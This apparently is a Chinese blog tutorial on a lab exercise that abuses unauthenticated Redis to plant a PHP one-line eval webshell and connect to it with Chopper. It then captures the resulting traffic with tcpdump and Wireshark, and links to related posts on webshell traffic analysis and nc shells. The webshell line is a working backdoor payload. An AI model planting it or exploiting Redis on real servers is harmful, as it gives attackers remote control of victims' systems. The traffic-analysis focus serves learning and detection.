webshell与wireshark

最新推荐文章于 2023-12-08 18:18:56 发布
原创 最新推荐文章于 2023-12-08 18:18:56 发布 · 649 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了在一个环境配置了php、redis和apache服务的场景下,如何通过浏览器访问触发redis未授权漏洞,植入并利用一句话木马。接着,通过在Windows端使用chopper工具连接到webshell,查看服务器文件。随后,在虚拟机中运用tcpdump抓包,并使用wireshark进行深入的网络流量分析。

环境需求:php服务、redis服务、apache服务开启
浏览器访问:服务器IP/index.php

在这里插入图片描述

利用redis未授权漏洞,进入redis交互模式,输入一句话木马

<?php @eval($_POST['123']);?>

浏览器访问:服务器IP/qwe.php

在这里插入图片描述

在windows端 使用chopper进行连接

在这里插入图片描述

点击进入,可以看到其中文件

在这里插入图片描述

进入虚拟终端:

在这里插入图片描述

在虚拟机使用tcpdump进行抓包

tcpdump -i eth0 -w 111.pcap

使用wireshark进行分析

在这里插入图片描述

最低0.47元/天 解锁文章
29-4 webshell 流量分析-蚁剑
weixin_43263566的博客
03-22 619
上传木马到靶场之前讲过很多次了,这里就不多说了,使用蚁剑连接木马。
2021-05-03Wireshark流量包分析
m0_37442062的博客
05-03 3792
目录 WEB扫描分析 后台目录爆破分析 后台账号爆破 WEBSHELL上传 其他题目 参考链接 WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。 WEB扫描分析 题型: 通过给出的流量包获取攻击者使用的WEB扫描工具。 解题思路: 常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,We...
WireShark流量分析(中国菜刀,webshell
oJiuJieZhong的博客
02-12 4774
首先拿到这个流量包,还是先对整个包中的帧进行初步的查看,发现为大量的TCP数据帧和HTTP数据帧。 网络攻击一般来自于web,是web那就一定有http,接下来对http进行筛选 发现为大量的GET请求,GET请求在实质性的破坏上比POST请求的破坏性小,那接下来再进行对POST请求的筛选。 发现一个很特殊的数据帧,在访问xiaoma.php,并且一般用户是不会访问到upload文件夹的,接下来对此IP进行筛选,方便查看。 攻击者通过提前上传一个webshell文件(xiaoma.php),接下来通
Wireshark分析获取Webshell流量包
weixin_30898109的博客
05-27 2174
导出对象为http,观察文件名,发现对conf1g.php的访问多的异常 发现他在爆破,爆破一般情况下在最后的密码是正确的密码,得到密码youxiu 爆破成功后进入木马界面 在最后一个包中发现jpg 使用16进制编辑器打开发现flag 转载于:https://www.cnblogs.com/wanao/p/10930478.html...
Wireshark 分析常见 Web 攻击的流量特征
weixin_51559599的博客
12-08 9996
攻击者在输入字段中插入恶意的 SQL 语句,实现对数据库的增删改查。可以在 http 请求中通过查找 SQL 注入语句中的 union、select、sleep 等关键字来判断 SQL 注入的流量dvwa SQL Injection low 为例poc筛选目的 ip 为靶场服务器并且为 http 的流量找到 SQL 请求的 http 报文可以看到unionselectdatabase等 SQL 注入的关键字解码后即可看到原始 poc。
2021-10-02 陇剑杯webshell WP 关于wireshark使用
m0_51170293的博客
10-08 1552
陇剑杯webshell WP 借此熟悉完整的渗透流程 黑客登录系统使用的密码是__Admin123!@# 搜password 黑客修改了一个日志文件,文件的绝对路径为_/var/www/html/data/Runtime/Logs/Home/21_08_07.log。 可能是搜索log 黑客获取webshell之后,权限是_www-data__ 其中web根目录可以再system命令中看到 黑客写入的webshell文件名是___1.php___。 右键复制值 Form item: “aaa”
精选资源
CTF工具之wireshark(misc).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
wireshark如何进行webshell
最新发布
10-29
我们正在讨论使用Wireshark进行Webshell操作分析的方法。根据引用内容,我们可以总结出以下关键点: 1. Wireshark是用于分析网络流量(pcap文件)的工具(引用[1])。 2. 在分析Webshell相关的流量时,可以关注以下...
抓包拿Webshell教程
08-13
新思路 抓包拿Webshell教程 通过监听端口突破上传
Webshell之蚁剑流量分析
qq_51323560的博客
05-15 2851
--------------------------------------------------------------------------------------------------------------------------------第一次学习webshell流量分析,还请大佬们多多指教。参数1,str参数是指将要进行截取字符操作的字符串。参数3, length参数是说明本次截取操作的长度,(2)分析发现真正有效的字符串是去除头部的2个字母。(3)查看虚拟终端执行的命令。
《网络安全应急响应技术实战指南》知识点总结(第6章 webshell网络安全应急响应)
qiuqiunile_的博客
03-26 4560
一、webshell概述 webshell通常指以JSP、ASP、PHP等网页脚本文件形式存在的一种服务器可执行文件,一般带有文件操作、执行命令功能,是一种网页后门。攻击者在入侵一个网站后,通常会将webshell后门文件网站服务web目录下正常的网页文件混在一起,使用浏览器或专用客户端进行连接,从而得到一个服务器操作环境,以达到控制网站服务器的目的。 二、webshell分类 1、JSP型webshell脚本 全称Java Server Pages,是一种动态web资源的开发技术。JSP是在传统的网页H
常见工具 nc Wireshark反弹shell
代码审计
04-20 1584
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
wireshark流量分析实战
热门推荐
qq_43571759的博客
04-10 1万+
wireshark Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接网卡进行数据报文交换。 下面是在网上找的数据包资源,来自2018的铁人三项流量分析题目,一共有二十题,共有六个数据包,本人习惯一题一题来,不过可能是个很不好的习惯 1.黑客的IP是多少...
网络数据分析溯源(WebShell密码)
qq_36933272的博客
09-05 2015
wireshark打开数据包 有题目提示,有人连接过一句话的webshell,猜想可能是asp、php之类的木马 用http.request.method ==“POST” && http contains "php"尝试过滤,发现xiaoma.php 查看发现d76R3478就是webshell的密码 输入密码,得到key ...
WebShell简介
YJ_12340的博客
08-08 1771
• JSP类型• ASP类型• PHP类型。
WebShell工具特征流量分析合集
爱吃仡坨的Blog
10-25 2378
通过编码的数据包1特征,发现是URL编码(BP会自动对其解码显示)还可以通过解码网站对其进行解码,之后分析数据包特征如下图,发现通过蚁剑终端传参之后得到的响应包任然是明文的。
web渗透—wireshark过滤
dongxie_tk的博客
11-01 672
1.过滤IP,如来源IP或者目标IP等于某个IP 例子: ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 或者 ip.addr eq 192.168.1.107 // 都能显示来源IP和目标IP 2.过滤端口 例子: tcp.port eq 80 // 不管端口是来源的还是目标的都显示 tcp.port == 80 tcp.p
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 2000
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
攻防世界-心仪的公司
weixin_49539962的博客
08-14 365
最后一个包看起来和其他的不同,打开后找到flag,虽然不是flag开头,不过格式很像、文件的名字就是webshell,打开文件后直接搜索shell。大佬的wp是上Linux用命令直接找大括号,这个速度快得多。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值